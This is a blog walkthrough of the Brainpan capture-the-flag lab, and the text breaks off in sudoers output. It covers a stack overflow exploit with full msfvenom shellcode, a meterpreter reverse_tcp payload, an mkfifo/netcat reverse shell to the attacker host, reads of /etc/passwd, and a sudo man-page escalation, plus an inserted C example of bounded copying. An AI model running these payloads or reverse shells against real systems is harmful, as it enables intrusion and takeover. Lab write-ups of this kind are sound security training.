Friday, 13 June 2014

PENTEST LAB - BRAINPAN (probably the fastest way)

Hi and welcome! This is the "PENTEST LAB" series, featuring a walkthrough of the "Brainpan" challenge. After my success with the "Brainpan: 2" challenge (part I and part II) I decided to look into the first version. I grabbed the file from here. It's configured like the second one and gets its IP address from DHCP.








!!!SPOILER ALERT!!!
 If you want to finish this challenge alone stop reading here.







GOAL: Obtain root on the system.

Challenge accepted!

Like always, let's look for the IP first:
>_ term
 Currently scanning: Finished!   |   Screen View: Unique Hosts                       
                                                                                                                                        
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.57.1    08:00:27:da:53:b9    01    060   CADMUS COMPUTER SYSTEMS  
 192.168.57.9    08:00:27:13:67:1a    01    042   CADMUS COMPUTER SYSTEMS
Now check open ports:
>_ term
Starting Nmap 6.45 ( http://nmap.org ) at 2014-06-04 15:02 CEST
Nmap scan report for 192.168.57.9
Host is up (0.00022s latency).
Not shown: 11998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn't have a title (text/html).
| ndmp-version:
|_  ERROR: Failed to get host information from server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.45%I=7%D=6/4%Time=538F18D7%P=x86_64-unknown-linux-gnu%
SF:r(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\
SF:|_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\
SF:x20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_
SF:\|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x2
SF:0_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x
SF:20\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x
SF:20\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINP
SF:AN\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENT
SF:ER\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 08:00:27:13:67:1A (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.57.9

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds

Two ports, 9999 and 10000. Looks similar to Brainpan:2: SimpleHTTPServer (Python) and a custom app. The HTTP server hosts an image. I launched dirbuster against it. While dirbuster was working I checked the custom app on 9999.
>_ term
$ nc 192.168.57.9 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

A banner with a prompt for a password. After playing with it for a while I had nothing and went back to dirbuster to check its findings. One folder found with a binary inside. I downloaded it and checked it with the "file" command. Looks like a Windows binary. Running strings against it gave me this:
>_ term
$ strings http10000-brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             
                          >>
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.

The "shitstorm" caught my attention and I typed it as the password in the custom app.
>_ term
$ nc 192.168.57.9 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED
Access granted and "Connection closed"...looks like the app only checks the password and then closes the connection. That leaves me only one way into the system: exploiting that app. What I knew at that point:
  • system is running with one IP: 192.168.57.9
  • two ports are open: 9999 and 10000
  • python SimpleHTTPServer on 10000
  • custom app on 9999, running in wine
  • app binary accessible through http server
  • app must be exploited in order to get inside system

I had two choices here: since the app is a Windows binary I could debug it on a Windows machine or try with wine and OllyDbg on Linux. I chose the second option and stayed with Linux. That binary is some kind of server: it opens a socket and waits for connections. When a connection arrives it reads input, checks whether it equals the magic string and then closes the connection. I ran some tests to check if I could crash it. Indeed, providing very long input crashed the app.

I started by debugging the properly working server. There's a function named "get_reply" which is called after accepting a connection from the user. I set breakpoints on the exit point (the LEAVE and RETN instructions) of that function, connected to the server and sent some "aaaa" as input. The screenshot below shows my data in memory.

Worth noting is the start address of the provided data, which is 0x0043F600. Going one step further:

ESP now points to address 0x0043F80C, which holds the value 311715EB; if we proceed we can see that's the address the program jumps to:

Let's do some calculations: 0xF80C - 0xF600 = 0x20C = 524. So input longer than 524 chars will break the app. I created a Python script for that purpose.
Later I'll use that script for exploitation, because I'll probably need a way to send hex (binary) data to the server as input. Below you can see how the app copies 550 bytes to the buffer:

Let's check address 0x0043F80C:

its value has been overwritten with 61's ('a') and the app crashed while trying to read memory at address 0x61616161:
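The crash above is the textbook result of copying client input into a fixed-size stack buffer without checking its length. As an added example (not the Brainpan binary's own code, which was only observed in the debugger), here is what a bounded version of that copy routine looks like in C, beside the strncpy half-fix that often replaces it and silently drops the terminator. The 524-byte capacity is assumed from the 0x20C offset calculated above; the function names and the 550-byte sample input are my own.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not the challenge's code. The Brainpan service's get_reply
 * copies whatever the client sends into a fixed stack buffer; the offset
 * calculation above shows the saved return address sitting 524 bytes past
 * the start of that buffer, so 550 bytes of input overwrite it. The routine
 * below is the defensive counterpart: the capacity travels with the buffer
 * and over-long input is refused before a single byte is copied. */

#define REPLY_BUF 524   /* capacity assumed from the 0x20C offset above */

enum reply_status { REPLY_OK = 0, REPLY_TOO_LONG = -1, REPLY_BAD_ARGS = -2 };

/* Copy len bytes of client input into dst (capacity cap), always NUL-terminated. */
int get_reply_bounded(char *dst, size_t cap, const char *src, size_t len)
{
    if (dst == NULL || src == NULL || cap == 0)
        return REPLY_BAD_ARGS;
    if (len >= cap)              /* one byte must stay free for the terminator */
        return REPLY_TOO_LONG;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return REPLY_OK;
}

/* A common half-fix is strncpy(dst, src, cap). It stops after cap bytes, but
 * when strlen(src) >= cap it writes no terminator, and the next strlen or
 * printf on dst reads past the buffer. Returns 1 when dst is left unterminated. */
int strncpy_leaves_unterminated(char *dst, size_t cap, const char *src)
{
    strncpy(dst, src, cap);
    return memchr(dst, '\0', cap) == NULL;
}

int main(void)
{
    char reply[REPLY_BUF];
    char oversized[550];                 /* constructed: mirrors the 550-byte crash input */
    memset(oversized, 'a', sizeof oversized);

    printf("4-byte input: status %d\n",
           get_reply_bounded(reply, sizeof reply, "aaaa", 4));
    printf("550-byte input: status %d (rejected, nothing copied)\n",
           get_reply_bounded(reply, sizeof reply, oversized, sizeof oversized));

    char name[18];
    printf("strncpy of 24 chars into 18 bytes left unterminated: %d\n",
           strncpy_leaves_unterminated(name, sizeof name, "aaaaaaaaaaaaaaaaaaaaaaaa"));
    return 0;
}
```

The design point is that the check happens on the length the caller already knows (the recv() return value) before the copy, and rejection is a normal return code the server can log and act on, rather than a crash. Note the strict `len >= cap` comparison: input of exactly 524 bytes would fill the buffer with no room for the terminator, so it is rejected too.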

What I needed now was a way to execute my code by making the app jump into it. Unfortunately I couldn't provide the address at which my variable is stored because there were 0's in it. "\x00" is called a null byte, and when the app reads user input it stops at that byte. I started looking for another way...if you check the last image you will see that, after the jump, ESP points to address 0x0043F810. My data is there, so I can write anything there. The only thing needed now is a "JMP ESP" somewhere in the app code. I opened the binary in hte, changed mode to "pe/image", pressed F7 for search, changed mode to "display: regex" and searched for "jmp.+esp". Here's the result:

My payload will need to look like that:
| 524 bytes of garbage | jmp esp address | nop sled (just in case) | shellcode |
I have "notepad.exe" in wine, so I created the needed code (mind the -b option: with it and "\x00" as the value, the generated code won't contain any null bytes, which is crucial here):
>_ term
$ msfvenom -p windows/exec CMD=notepad.exe -b "\x00" -f py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 230 (iteration=0)
buf =  ""
buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x33\x31\x46\x15\x83\xee\xfc\x03\x46\x11\xe2"
buf += "\x1e\x9a\x31\x80\xe0\x63\xc2\xf3\x69\x86\xf3\x21\x0d"
buf += "\xc2\xa6\xf5\x46\x86\x4a\x7d\x0a\x33\xd8\xf3\x82\x34"
buf += "\x69\xb9\xf4\x7b\x6a\x0f\x38\xd7\xa8\x11\xc4\x2a\xfd"
buf += "\xf1\xf5\xe4\xf0\xf0\x32\x18\xfa\xa1\xeb\x56\xa9\x55"
buf += "\x98\x2b\x72\x57\x4e\x20\xca\x2f\xeb\xf7\xbf\x85\xf2"
buf += "\x27\x6f\x91\xbc\xdf\x1b\xfd\x1c\xe1\xc8\x1d\x60\xa8"
buf += "\x65\xd5\x13\x2b\xac\x27\xdc\x1d\x90\xe4\xe3\x91\x1d"
buf += "\xf4\x24\x15\xfe\x83\x5e\x65\x83\x93\xa5\x17\x5f\x11"
buf += "\x3b\xbf\x14\x81\x9f\x41\xf8\x54\x54\x4d\xb5\x13\x32"
buf += "\x52\x48\xf7\x49\x6e\xc1\xf6\x9d\xe6\x91\xdc\x39\xa2"
buf += "\x42\x7c\x18\x0e\x24\x81\x7a\xf6\x99\x27\xf1\x15\xcd"
buf += "\x5e\x58\x70\x10\xd2\xe7\x3d\x12\xec\xe7\x6d\x7b\xdd"
buf += "\x6c\xe2\xfc\xe2\xa7\x46\xf2\xa8\xe5\xef\x9b\x74\x7c"
buf += "\xb2\xc1\x86\xab\xf1\xff\x04\x59\x8a\xfb\x15\x28\x8f"
buf += "\x40\x92\xc1\xfd\xd9\x77\xe5\x52\xd9\x5d\x8b\x3b\x51"
buf += "\x3b\x23\xa5\xfd\xed\xa6\x5d\x9b\xf1"
and packed everything into the Python script:
I started the app in OllyDbg and launched the script. Looks good:

I created another script with the Windows reverse TCP payload:
>_ term
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.57.1 LPORT=4444 -b "\x00" -f py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 314 (iteration=0)
buf =  ""
buf += "\xda\xd3\xd9\x74\x24\xf4\xbf\xf9\x39\xa1\xb0\x5d\x31"
buf += "\xc9\xb1\x48\x31\x7d\x1a\x83\xc5\x04\x03\x7d\x16\xe2"
buf += "\x0c\xc5\x49\x36\xee\x36\x8a\x57\x67\xd3\xbb\x45\x13"
buf += "\x97\xee\x59\x50\xf5\x02\x11\x34\xee\x91\x57\x90\x01"
buf += "\x11\xdd\xc6\x2c\xa2\xd3\xc6\xe3\x60\x75\xba\xf9\xb4"
buf += "\x55\x83\x31\xc9\x94\xc4\x2c\x22\xc4\x9d\x3b\x91\xf9"
buf += "\xaa\x7e\x2a\x71\xe0\x6e\x2a\x66\xb2\x8f\x1b\x39\xc9"
buf += "\xc9\xbb\xbb\x1e\x62\xf2\xa3\x43\x49\x4c\x5f\xb7\x39"
buf += "\x4f\x89\x86\xc2\x61\xf5\x44\xfd\x4d\xf8\x95\x39\x69"
buf += "\xe3\xe0\x31\x89\x9e\xf2\x81\xf3\x44\x77\x14\x53\x0e"
buf += "\x2f\xfc\x65\xc3\xa9\x77\x69\xa8\xbe\xd0\x6e\x2f\x13"
buf += "\x6b\x8a\xa4\x92\xbc\x1a\xfe\xb0\x18\x46\xa4\xd9\x39"
buf += "\x22\x0b\xe6\x5a\x8a\xf4\x42\x10\x39\xe0\xfb\x7b\x56"
buf += "\xc5\xc9\x83\xa6\x41\x5a\xf7\x94\xce\xf0\x9f\x94\x87"
buf += "\xde\x58\xda\xbd\xa6\xf7\x25\x3e\xd6\xde\xe1\x6a\x86"
buf += "\x48\xc3\x12\x4d\x89\xec\xc6\xc1\xd9\x42\xb9\xa1\x89"
buf += "\x22\x69\x49\xc0\xac\x56\x69\xeb\x66\xff\x03\x11\xe1"
buf += "\xc0\x7b\x20\xf0\xa8\x79\x53\xe3\x74\xf4\xb5\x69\x95"
buf += "\x50\x6d\x06\x0c\xf9\xe5\xb7\xd1\xd4\x83\xf8\x5a\xda"
buf += "\x74\xb6\xaa\x97\x66\x2f\x5b\xe2\xd5\xe6\x64\xd9\x70"
buf += "\x07\xf1\xe5\xd2\x50\x6d\xe7\x03\x96\x32\x18\x66\xac"
buf += "\xfb\x8c\xc9\xdb\x03\x40\xca\x1b\x52\x0a\xca\x73\x02"
buf += "\x6e\x99\x66\x4d\xbb\x8d\x3a\xd8\x43\xe4\xef\x4b\x2b"
buf += "\x0a\xc9\xbc\xf4\xf5\x3c\x3d\xc9\x23\x79\xbb\x3b\x46"
buf += "\x69\x07"
started the Metasploit handler and executed the script:
>_ term
$ python brainploit4.py 192.168.57.9 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>


>_ term
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.57.1
LHOST => 192.168.57.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.57.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.57.9
[*] Meterpreter session 1 opened (192.168.57.1:4444 -> 192.168.57.9:35643) at 2014-06-13 12:13:26 +0200

meterpreter > ls

Listing: Z:\home\puck
=====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2013-03-06 21:23:44 +0100  .
40777/rwxrwxrwx   0     dir   2013-03-04 17:49:37 +0100  ..
100666/rw-rw-rw-  0     fil   2013-03-05 21:27:00 +0100  .bash_history
100666/rw-rw-rw-  220   fil   2013-03-04 17:49:37 +0100  .bash_logout
100666/rw-rw-rw-  3637  fil   2013-03-04 17:49:37 +0100  .bashrc
40777/rwxrwxrwx   0     dir   2013-03-04 19:13:51 +0100  .cache
40777/rwxrwxrwx   0     dir   2013-03-04 19:16:33 +0100  .config
100666/rw-rw-rw-  55    fil   2013-03-05 21:25:15 +0100  .lesshst
40777/rwxrwxrwx   0     dir   2013-03-04 19:16:33 +0100  .local
100666/rw-rw-rw-  675   fil   2013-03-04 17:49:37 +0100  .profile
100666/rw-rw-rw-  513   fil   2013-03-06 21:23:43 +0100  checksrv.sh
40777/rwxrwxrwx   0     dir   2013-03-04 20:45:00 +0100  web

meterpreter > pwd
Z:\home\puck
meterpreter > cd /
meterpreter > ls

Listing: Z:\
============

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40777/rwxrwxrwx   0         dir   2013-03-04 19:02:15 +0100  bin
40777/rwxrwxrwx   0         dir   2013-03-04 17:19:23 +0100  boot
40777/rwxrwxrwx   0         dir   2014-06-13 14:09:49 +0200  etc
40777/rwxrwxrwx   0         dir   2013-03-04 17:49:37 +0100  home
100666/rw-rw-rw-  15084717  fil   2013-03-04 17:18:57 +0100  initrd.img
100666/rw-rw-rw-  15084717  fil   2013-03-04 17:18:57 +0100  initrd.img.old
40777/rwxrwxrwx   0         dir   2013-03-04 19:04:41 +0100  lib
40777/rwxrwxrwx   0         dir   2013-03-04 16:12:09 +0100  lost+found
40777/rwxrwxrwx   0         dir   2013-03-04 16:12:14 +0100  media
40777/rwxrwxrwx   0         dir   2012-10-09 16:59:43 +0200  mnt
40777/rwxrwxrwx   0         dir   2013-03-04 16:13:47 +0100  opt
40777/rwxrwxrwx   0         dir   2013-03-08 05:07:15 +0100  root
40777/rwxrwxrwx   0         dir   2014-06-13 14:09:53 +0200  run
40777/rwxrwxrwx   0         dir   2013-03-04 17:20:14 +0100  sbin
40777/rwxrwxrwx   0         dir   2012-06-11 16:43:21 +0200  selinux
40777/rwxrwxrwx   0         dir   2013-03-04 16:13:47 +0100  srv
40777/rwxrwxrwx   0         dir   2014-06-13 14:13:01 +0200  tmp
40777/rwxrwxrwx   0         dir   2013-03-04 16:13:47 +0100  usr
40777/rwxrwxrwx   0         dir   2013-03-08 05:13:25 +0100  var
100666/rw-rw-rw-  5180432   fil   2013-02-25 20:32:04 +0100  vmlinuz
100666/rw-rw-rw-  5180432   fil   2013-02-25 20:32:04 +0100  vmlinuz.old

meterpreter >
I got the connection and a meterpreter session. I checked a few things. I was happily surprised to discover that I can access the Linux folders. Unfortunately I couldn't spawn a shell, so I decided to use a netcat reverse shell:
>_ term
$ msfvenom -p linux/x86/exec CMD="mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.57.1 4444 >/tmp/f" -b "\x00" -f py
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 132 (iteration=0)
buf =  ""
buf += "\xd9\xce\xbd\xde\x40\x6e\xf8\xd9\x74\x24\xf4\x58\x29"
buf += "\xc9\xb1\x1b\x31\x68\x18\x03\x68\x18\x83\xe8\x22\xa2"
buf += "\x9b\x92\xd1\x7b\xfd\x31\x83\x13\xd0\xd6\xc2\x03\x42"
buf += "\x36\xa7\xa3\x93\x20\x68\x56\xfd\xde\xff\x75\xaf\xf6"
buf += "\xb9\x79\x50\x07\x28\x11\x36\x6e\xd4\x8a\x96\x5f\x6c"
buf += "\x38\xa7\xb0\xea\xf9\x24\xae\x86\xdd\x85\x44\x0b\x6e"
buf += "\xf5\xc2\xaf\xa1\x6b\x62\x21\x91\x18\x1c\x9d\xc0\xb7"
buf += "\xfc\xef\x24\x6e\xcc\x73\x37\x0d\x0e\xba\xfe\xe3\x60"
buf += "\x8d\x36\x3c\x53\xd8\x01\x12\x9a\x02\x5a\x5e\xe8\x76"
buf += "\x82\xa0\x3f\x02\xaf\xac\x10\x8c\x2f\x1a\x3c\xd9\xd1"
buf += "\x69\x42"
It worked like a charm:
>_ term
$ nc -l -p 4444 -v
nc: listening on :: 4444 ...
nc: listening on 0.0.0.0 4444 ...
nc: connect to 192.168.57.1 4444 from 192.168.57.9 (192.168.57.9) 35644 [35644]
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
$ python -c 'import pty;pty.spawn("/bin/bash");'
puck@brainpan:/home/puck$ ls -la
ls -la
total 48
drwx------ 7 puck puck 4096 Mar  6  2013 .
drwxr-xr-x 5 root root 4096 Mar  4  2013 ..
-rw------- 1 puck puck    0 Mar  5  2013 .bash_history
-rw-r--r-- 1 puck puck  220 Mar  4  2013 .bash_logout
-rw-r--r-- 1 puck puck 3637 Mar  4  2013 .bashrc
drwx------ 3 puck puck 4096 Mar  4  2013 .cache
drwxrwxr-x 3 puck puck 4096 Mar  4  2013 .config
-rw------- 1 puck puck   55 Mar  5  2013 .lesshst
drwxrwxr-x 3 puck puck 4096 Mar  4  2013 .local
-rw-r--r-- 1 puck puck  675 Mar  4  2013 .profile
drwxrwxr-x 4 puck puck 4096 Jun 13 07:41 .wine
-rwxr-xr-x 1 root root  513 Mar  6  2013 checksrv.sh
drwxrwxr-x 3 puck puck 4096 Mar  4  2013 web
puck@brainpan:/home/puck$ cat checksrv.sh
cat checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep brainpan.exe | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
    fi
    cd /home/puck/web
    /usr/bin/python -m SimpleHTTPServer 10000
fi
puck@brainpan:/home/puck$
Nothing interesting in the user's home folder....
>_ term
puck@brainpan:/home/puck$ cd ..
cd ..
puck@brainpan:/home$ ls
ls
anansi  puck  reynard
puck@brainpan:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Mar  4  2013 .
drwxr-xr-x 22 root    root    4096 Mar  4  2013 ..
drwx------  4 anansi  anansi  4096 Mar  4  2013 anansi
drwx------  7 puck    puck    4096 Mar  6  2013 puck
drwx------  3 reynard reynard 4096 Mar  4  2013 reynard

Two more users in the system....
>_ term
puck@brainpan:/home$ cd /opt
cd /opt
puck@brainpan:/opt$ ls
ls
puck@brainpan:/opt$ ls -la
ls -la
total 8
drwxr-xr-x  2 root root 4096 Mar  4  2013 .
drwxr-xr-x 22 root root 4096 Mar  4  2013 ..
puck@brainpan:/opt$ cd /etc
cd /etc
puck@brainpan:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
puck@brainpan:/etc$
one of them is probably admin:
>_ term
puck@brainpan:/etc$ cat group
cat group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:
puck@brainpan:/etc$
Looks like there's sudo here :)
>_ term
puck@brainpan:/etc$ ls -la sudoers
ls -la sudoers
-r--r----- 1 root root 843 Mar  4  2013 sudoers
puck@brainpan:/etc$
Can my user use it?
>_ term
puck@brainpan:/etc$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/etc$
Let's have a look:
>_ term
puck@brainpan:/etc$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
puck@brainpan:/home/puck$
"manual" option uses "man" command. I can read everything now:
>_ term
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual /etc/sudoers
<udo /home/anansi/bin/anansi_util manual /etc/sudoers                       
/usr/bin/man: manual-/etc/sudoers: No such file or directory
/usr/bin/man: manual_/etc/sudoers: No such file or directory
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
#  #  This file MUST be edited with the ’visudo’ command as root.
# # Please consider adding local content in  /etc/sudoers.d/  in‐
stead  of  #  directly modifying this file.  # # See the man page
for  details  on  how  to  write   a   sudoers   file.    #   De‐
faults        env_reset      Defaults        mail_badpass     De‐
faults        secure_path="/usr/local/sbin:/usr/lo‐
cal/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

